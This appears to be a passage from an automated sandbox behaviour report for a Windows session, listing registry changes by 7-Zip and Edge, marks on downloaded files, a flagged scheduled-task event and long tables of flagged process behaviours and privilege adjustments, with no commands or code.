Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open\command C:\Program Files\7-Zip\7zFM.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.TAR\SHELL\OPEN\COMMAND C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\ = "zip Archive" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,1" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab\DefaultIcon C:\Program Files\7-Zip\7zFM.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.7Z\SHELL\OPEN\COMMAND C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\ = "txz Archive" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop-1920x1080 (1).jpg:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
